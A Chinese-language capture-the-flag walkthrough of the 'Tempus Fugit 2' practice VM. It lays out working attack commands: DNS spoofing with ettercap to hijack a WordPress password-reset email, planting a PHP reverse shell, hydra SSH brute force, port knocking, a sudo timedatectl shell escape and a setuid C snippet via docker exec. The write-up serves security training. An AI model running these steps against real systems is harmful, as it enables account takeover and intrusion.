环境准备
靶机链接:百度网盘 请输入提取码
提取码:5i9p
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2022.03
信息收集
1.对靶机进行端口和服务的扫描
nmap -sV -p- -A 10.10.10.130
可以看到22端口是关闭的
2.用gobuster扫描目录
gobuster dir -u http://10.10.10.130/ -w /usr/share/wordlists/dirb/big.txt -t 100
漏洞利用
1.访问网页,进入wordpress登录界面
2.发现一个域名写入/etc/hosts
3.用wpscan 进行用户枚举
wpscan --url http://tf2/ -e u
4.输入admin点击丢失密码
5.他这里说email发不了啥的。
6.用wireshark进行截取流量,发现dns
7.本地开启smtp服务,进行劫持
python -m smtpd -n -c DebuggingServer 10.10.10.128:25
vi /etc/ettercap/etter.dns
*.tempusfugit2.com A 10.10.10.128
所有访问域名的流量,会转到本地
8.ettercap -G 开启工具,设置目标ip
9.进行dns_spoof
10.回到登录网页,点击丢失密码
11.这边就成功劫持到,修改密码的链接
12.访问网址,查看到密码
http://TF2/wp-login.php?action=rp&key=c9tsuIZcEqW6qSoB4hBs&login=admin
m^F13sBwxPyGenqN
13.成功登录wordpress界面
14.修改404.php为php-reverse-shell.php的源码(github里有)
权限提升
1.反弹交互式shell
SHELL=bash script -q /dev/null
2.在网站的配置文件里发现,用户名密码
ElvisP
super.Secret.SQL.Password.For.ElvisP
3.并且这个shell是一个容器的shell
4.在/var/www/html/wp-content/TFDocuments/发现nb.txt
5.对内容进行base64解密,应该是用户名和密码
echo "ZG9ubjo5ZjRsdzByODJ5bzMK" | base64 -d
9f4lw0r82yo3
6.因为22端口是关闭的,只能通过knock敲门来打开
7.开启22端口
knock 10.10.10.130 1981 867 5309
8.成功登录donn用户
ssh donn@10.10.10.130
9.进行提权操作
sudo -u auria /usr/bin/timedatectl list-timezones
!/bin/sh
10.成功提权到auri用户
11.对auria用户进行爆破得到密码gateway
hydra -l auria -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.130 -t 50
gateway
12.登录auria用户后 ,发现该用户具有root权限免密执行/usr/bin/docker exec *
ssh auria@10.10.10.130
13.登录容器
sudo /usr/bin/docker exec -it 1786dd63dedb bash
cd /root/wp/wp-content
vi suid
int main(void) { setgid(0); setuid(0); execl("/bin/sh","sh",0); }
根据之前root路径下有一个网站的wp-content文件夹,怀疑是主机与容器共享一个文件夹,通过刚刚的反弹shell(www-data用户权限)在/var/www/html/wp-content文件夹下面创建一个文件,
然后回来查看/root/wp/wp-content/文件夹确实多了一文件
最终提权失败!
参考:Tempus fugit 2 writeup
Tempus Fugit 2 靶机练习__誠的博客-CSDN博客